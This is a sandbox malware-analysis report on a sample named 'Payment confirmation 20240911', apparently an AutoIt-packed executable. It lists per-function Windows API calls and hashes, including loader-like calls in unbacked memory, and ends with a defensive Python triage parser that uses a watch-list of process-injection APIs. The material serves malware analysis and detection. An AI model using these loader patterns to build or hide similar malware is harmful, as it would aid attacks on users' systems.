                                          • KillTimer.USER32 ref: 012E2A5D
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 012E2A80
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2A8B
                                          • CreatePopupMenu.USER32 ref: 012E2A9F
                                          • PostQuitMessage.USER32(00000000), ref: 012E2AAE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: c9c571db1903fa5ef8eb57c6ad6cc34c2c6e02146df9459c9b1a5becc4c5b1f6
                                          • Instruction ID: 469088ff92b3d04a47ec6a3006b4e75ebbcefcdb7f15d9d4a73cfe4bc26cc59d
                                          • Opcode Fuzzy Hash: c9c571db1903fa5ef8eb57c6ad6cc34c2c6e02146df9459c9b1a5becc4c5b1f6
                                          • Instruction Fuzzy Hash: AF410335274246EBEB35AF6CAC0DBBA3ADEFB24344FC44115FA0796295DAB09C408761

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32 ref: 012E30B0
                                          • LoadCursorW.USER32 ref: 012E30BF
                                          • LoadIconW.USER32 ref: 012E30D5
                                          • LoadIconW.USER32 ref: 012E30E7
                                          • LoadIconW.USER32 ref: 012E30F9
                                            • Part of subcall function 012E318A: LoadImageW.USER32 ref: 012E31AE
                                          • RegisterClassExW.USER32(?), ref: 012E3167
                                            • Part of subcall function 012E2F58: GetSysColorBrush.USER32 ref: 012E2F8B
                                            • Part of subcall function 012E2F58: RegisterClassExW.USER32(00000030), ref: 012E2FB5
                                            • Part of subcall function 012E2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2FC6
                                            • Part of subcall function 012E2F58: InitCommonControlsEx.COMCTL32(?), ref: 012E2FE3
                                            • Part of subcall function 012E2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012E2FF3
                                            • Part of subcall function 012E2F58: LoadIconW.USER32 ref: 012E3009
                                            • Part of subcall function 012E2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012E3018
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 625b46e4f36c20a391650c01f6cd3784454e569e11d8a9a2dd39677783fd48f6
                                          • Instruction ID: 4aa2515f20903dd736b4a51289deed914b7f31e43829057f7f9897beeb8b3100
                                          • Opcode Fuzzy Hash: 625b46e4f36c20a391650c01f6cd3784454e569e11d8a9a2dd39677783fd48f6
                                          • Instruction Fuzzy Hash: 072180B4E44354AFDB60DFA9E849A9ABFFDFB48314F40812EE604A7294D3749500CF91

                                          Control-flow Graph

                                          • Control-flow graph (basic blocks 2625f0-2628f2, in the non-PE region at 00260000): CreateFileW, VirtualAlloc, ReadFile and a second VirtualAlloc in sequence, then calls into 263750 and 263560, CloseHandle and VirtualFree; block 26280e-262817 loops back to the CreateFileW block at 2626a5, and a second VirtualFree at 2628dc lies on the exit path. Full block list omitted; the APIs are listed below.
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 002626C1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002628E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                          • Instruction ID: b494bed212ccf939bd2b4f1dd8bb7c2325b68f79adef0e7595fcb67310b222ac
                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                          • Instruction Fuzzy Hash: 43A12874E10209EBDB14CFA4C898BEEBBB5FF48304F208559E501BB280D7759A95CFA4

                                          Control-flow Graph

                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 012FEB27
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 01354B26
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 01354B65
                                          • RegCloseKey.ADVAPI32(?), ref: 01354B94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                          • API String ID: 1586453840-614718249
                                          • Opcode ID: 811cbe43e50dfad91de064a42ae4b747632c5d40d0e3f482ae94940c342a65e0
                                          • Instruction ID: b778576c24d36d01a54d773e3d913f0a995b6cf82ee766c048b48373fbad523b
                                          • Opcode Fuzzy Hash: 811cbe43e50dfad91de064a42ae4b747632c5d40d0e3f482ae94940c342a65e0
                                          • Instruction Fuzzy Hash: 49117F71A00109BEEB14ABA8CD85EFE77BCEF04748F504019F546E6190EAB09E41D760

                                          Control-flow Graph

                                          • Control-flow graph: a single basic block 12e2e9d-12e2f0d that calls CreateWindowExW twice and ShowWindow twice.
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: aade15c385d3ef6d798f4f11977e2565515c8de731b37f2c1549b6a800805e77
                                          • Instruction ID: 185fdc0170eab3dfa2d71928049a6f33150e8a8aeefb7996e6a63d44eb504c8b
                                          • Opcode Fuzzy Hash: aade15c385d3ef6d798f4f11977e2565515c8de731b37f2c1549b6a800805e77
                                          • Instruction Fuzzy Hash: E3F054707802E07AE7309A536C4CE773E7DE7C6F24F41401FF90492194C1650845CB70

                                          Control-flow Graph

                                          • Control-flow graph (basic blocks 2623b0-2625a5, in the non-PE region at 00260000): CreateFileW, VirtualAlloc and ReadFile in sequence, then calls into 2622e0, 2612a0 and 262330 before ExitProcess; one successor of each API block (2624eb, 262502, 262523, 26253e) leads straight to the common exit block 2625a0-2625a5. Full block list omitted; the APIs are listed below.
                                          APIs
                                            • Part of subcall function 002622A0: Sleep.KERNEL32(000001F4), ref: 002622B1
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 002624DF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: YMPN82YXG8K5FN4
                                          • API String ID: 2694422964-355732285
                                          • Opcode ID: 1b718d4410ffe313cc6461b8f19deb6cc1ab054c62be0e4bfe692aa4ebf1f919
                                          • Instruction ID: 212da55b2ac8952ecfc0d746a4308004cd228663a6f2e7cd70861b9b57a8a840
                                          • Opcode Fuzzy Hash: 1b718d4410ffe313cc6461b8f19deb6cc1ab054c62be0e4bfe692aa4ebf1f919
                                          • Instruction Fuzzy Hash: A0519230D14249EBEF15DBE4C855BEEBB79AF58300F004199E609BB2C0D7B91B49CB65

                                          Control-flow Graph

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0135454E
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • _memset.LIBCMT ref: 012E3965
                                          • _wcscpy.LIBCMT ref: 012E39B5
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 012E39C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: a9268b76e73dcc5889148b693ccf17eeabfa7fdc61c9d873ff544a06fff1af99
                                          • Instruction ID: a7eb63461e43244cc30e4d5d2d996e76d896ee918bfd7ed6bc2425092e3a1f22
                                          • Opcode Fuzzy Hash: a9268b76e73dcc5889148b693ccf17eeabfa7fdc61c9d873ff544a06fff1af99
                                          • Instruction Fuzzy Hash: 3531F471128342ABD731EB64CC48FEB77ECBF58315F80451EE28993190EB70A648CB92
                                          APIs
                                            • Part of subcall function 012E3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,012E34E2,?,00000001), ref: 012E3FCD
                                          • _free.LIBCMT ref: 01353C27
                                          • _free.LIBCMT ref: 01353C6E
                                            • Part of subcall function 012EBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,013A22E8,?,00000000,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?), ref: 012EBE8B
                                            • Part of subcall function 012EBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?,00000002), ref: 012EBEA7
                                            • Part of subcall function 012EBDF0: __wsplitpath.LIBCMT ref: 012EBF19
                                            • Part of subcall function 012EBDF0: _wcscpy.LIBCMT ref: 012EBF31
                                            • Part of subcall function 012EBDF0: _wcscat.LIBCMT ref: 012EBF46
                                            • Part of subcall function 012EBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 012EBF56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 1510338132-1757145024
                                          • Opcode ID: 7f33b3920ac550bcc11a5db465a87d178345db4138401c27d1c6d26d5c749a16
                                          • Instruction ID: 0687ac0a221d4d6ca09ed015182110dc41164f84087f25e17d7eae18764114e3
                                          • Opcode Fuzzy Hash: 7f33b3920ac550bcc11a5db465a87d178345db4138401c27d1c6d26d5c749a16
                                          • Instruction Fuzzy Hash: 6D91807191022AEFDF05EFA8CC94DFEB7B4BF18758F444469E816AB290EB349905CB50
                                          APIs
                                          • __getstream.LIBCMT ref: 0130418E
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 013041C9
                                          • __wopenfile.LIBCMT ref: 013041D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                          • String ID: <G
                                          • API String ID: 1820251861-2138716496
                                          • Opcode ID: c7d4fcc770a61729b9e64b5c26f0a9a44baed6bd4618980a4598bdc67ef6b385
                                          • Instruction ID: e8417eb6fc0731705fc63da1f4338e3486c9ac849fd0056b11522f39a5d3bd52
                                          • Opcode Fuzzy Hash: c7d4fcc770a61729b9e64b5c26f0a9a44baed6bd4618980a4598bdc67ef6b385
                                          • Instruction Fuzzy Hash: 3E11A370B0020BABDB27AFBC9C6066F3AE8AF642ACB048565D515DB2C0EB74C6519761
                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 012FC979
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 012FC99A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 012FC9BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 70f5fb84c89e515b4671f1dabf79dbf5a50cc97f911c1bd98c2ca471fd887100
                                          • Instruction ID: a2053bf479de992b4aebeb2078882966b0133eec769471691ad4ea6c1fd32a88
                                          • Opcode Fuzzy Hash: 70f5fb84c89e515b4671f1dabf79dbf5a50cc97f911c1bd98c2ca471fd887100
                                          • Instruction Fuzzy Hash: 4611707562120DFFDB218FA4D844DBEBBBCEF04740F00842AE641E7110D231AE509764
                                          APIs
                                            • Part of subcall function 012E16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,012E14EB), ref: 012E1751
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 012E159B
                                          • CoInitialize.OLE32(00000000), ref: 012E1612
                                          • CloseHandle.KERNEL32(00000000), ref: 013558F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: 0Bu
                                          • API String ID: 3815369404-956994742
                                          • Opcode ID: 44effd2e4397612ef240c0d3fc3d5e0594ad3a9c9c9bf3d01fb88aa0d27c0a84
                                          • Instruction ID: e3f991151d5d03308e085b3f119d9a70c9ee8ae4e62bb955d3150ddadb24269d
                                          • Opcode Fuzzy Hash: 44effd2e4397612ef240c0d3fc3d5e0594ad3a9c9c9bf3d01fb88aa0d27c0a84
                                          • Instruction Fuzzy Hash: 5B71CDB89152568FC334DF6EA194464BFFCFB69398FC8422EC05AA7299DB304408CF10
                                          APIs
                                            • Part of subcall function 012E41A7: _fseek.LIBCMT ref: 012E41BF
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF49
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF5C
                                          • _free.LIBCMT ref: 0132CDC9
                                          • _free.LIBCMT ref: 0132CDD0
                                          • _free.LIBCMT ref: 0132CE3B
                                            • Part of subcall function 013028CA: HeapFree.KERNEL32(00000000,00000000), ref: 013028DE
                                            • Part of subcall function 013028CA: GetLastError.KERNEL32(00000000,?,01308715,00000000,013088A3,01304673,?), ref: 013028F0
                                          • _free.LIBCMT ref: 0132CE43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 5e0b1d4fa2683604ff57dd6fcc4c3597553859fdb5aa54563d823b3b0f935a78
                                          • Instruction ID: e754638b737d2d9793f232ba0cb70da7c810bdd84ef95b79cd1ed8b07ade0f5a
                                          • Opcode Fuzzy Hash: 5e0b1d4fa2683604ff57dd6fcc4c3597553859fdb5aa54563d823b3b0f935a78
                                          • Instruction Fuzzy Hash: 97514FB1904219AFDF15AF68CC84AAEBBB9EF58304F1040AEE61DE7290D7715A40CF59
                                          APIs
                                          • _memset.LIBCMT ref: 01353CF1
                                          • GetOpenFileNameW.COMDLG32(?,?,00000001,013A22E8), ref: 01353D35
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 012E3A67: SHGetMalloc.SHELL32(012E3C31), ref: 012E3A7D
                                            • Part of subcall function 012E3A67: SHGetDesktopFolder.SHELL32(?), ref: 012E3A8F
                                            • Part of subcall function 012E3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 012E3AD2
                                            • Part of subcall function 012E3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,013A22E8,?), ref: 012E3B65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                          • String ID: X
                                          • API String ID: 3714316930-3081909835
                                          • Opcode ID: cf66ed0e6e489efc40e78c0d16d795d585938148fc2df1b0d5b6516eacf54688
                                          • Instruction ID: d18d9b4d5b8e282f4f7d8db432d509b49d092fa73c51cbeb939582c6d9f88179
                                          • Opcode Fuzzy Hash: cf66ed0e6e489efc40e78c0d16d795d585938148fc2df1b0d5b6516eacf54688
                                          • Instruction Fuzzy Hash: 4611CAB1A10289ABCF05DFE8D8496EE7BFDBF55705F40800DE501BB341DBB585498BA1
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0132D01E
                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0132D035
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 1cf29d09ef242672dcd6a31b07762b2d4ff3d9a43c724d2baca0cf0936e4fc06
                                          • Instruction ID: c7bd0468752dbd870efc2623de6eb6f89fb7fd0a5926a98a082d53a535721db0
                                          • Opcode Fuzzy Hash: 1cf29d09ef242672dcd6a31b07762b2d4ff3d9a43c724d2baca0cf0936e4fc06
                                          • Instruction Fuzzy Hash: 1CD05EB164030EBBDB20ABA0ED0EF99776CA704708F108190B655D10D1D2B0D5458BA0
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00261A5B
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00261B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CreateMemoryRead
                                          • String ID:
                                          • API String ID: 2726527582-0
                                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                          • Instruction ID: 70b291624b569d7714abb1e02eb564304d61bf2c8208d42a6a04f690de3c893c
                                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                          • Instruction Fuzzy Hash: E6621D30A24258DBEB24CFA4C851BDEB372EF58300F1491A9D50DEB390E7769E91CB59
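The record above is the one worth pausing on: a function lifted from the 0x260000 region, which Joe marks as not backed by a PE image, that calls CreateProcessW and then ReadProcessMemory. Added triage example, not Joe Sandbox code and not part of this report: a parser for the per-function record format shown on this page (the APIs, Memory Dump Source and Similarity blocks) that groups functions by dump region and flags those in unbacked memory that touch process-manipulation APIs. The PROCESS_APIS watch-list is an assumption of this example, not a Joe Sandbox signature; the sample text is two records copied from this page with their argument lists trimmed.

```python
"""Parse Joe Sandbox "IDA Plugin" function records and flag process code in unbacked memory.

Added example, not Joe Sandbox code. A record ends at its "Instruction Fuzzy Hash"
line; "based on PE: false" marks a dump region with no image on disk behind it.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Assumed watch-list: APIs worth a look when called from memory not backed by a PE.
PROCESS_APIS = {
    "CreateProcessW", "CreateProcessA", "ReadProcessMemory", "WriteProcessMemory",
    "NtUnmapViewOfSection", "VirtualAllocEx", "SetThreadContext", "ResumeThread",
}
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Control-flow Graph"}
# Line shapes taken from the report: "• Name.MODULE(args), ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for calls made by callees.
API_RE = re.compile(r"^[•*-]\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>[A-Za-z_@][\w@]*)\.(?P<module>[A-Z0-9]+)")
REF_RE = re.compile(r"ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
FIELD_RE = re.compile(r"^[•*-]\s*(?P<key>API ID|String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$")


@dataclass
class FunctionRecord:
    offset: str = ""
    backed_by_pe: bool = True
    dump: str = ""
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""
    direct_apis: list = field(default_factory=list)    # (name, module, ref) called directly
    subcall_apis: list = field(default_factory=list)   # same, reached through callees

    def api_names(self):
        return {n for n, _, _ in self.direct_apis} | {n for n, _, _ in self.subcall_apis}


def parse_records(text):
    """Split report text into FunctionRecords; the fuzzy-hash line closes a record."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            ref = REF_RE.search(line)
            entry = (m["name"], m["module"], ref.group(1) if ref else "")
            (cur.subcall_apis if m["sub"] else cur.direct_apis).append(entry)
        elif section == "Memory Dump Source" and (m := SRC_RE.search(line)):
            cur.dump, cur.offset = m["dump"], m["off"].upper()
            cur.backed_by_pe = m["pe"] == "true"
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            key, val = m["key"], m["val"].strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.string_id = val
            else:
                cur.fuzzy_hash = val
                records.append(cur)
                cur = FunctionRecord()
    return records


def functions_per_region(records):
    """Count functions per dump region, e.g. '00260000 (unbacked)' -> 1."""
    return Counter(f"{r.offset} ({'backed' if r.backed_by_pe else 'unbacked'})"
                   for r in records)


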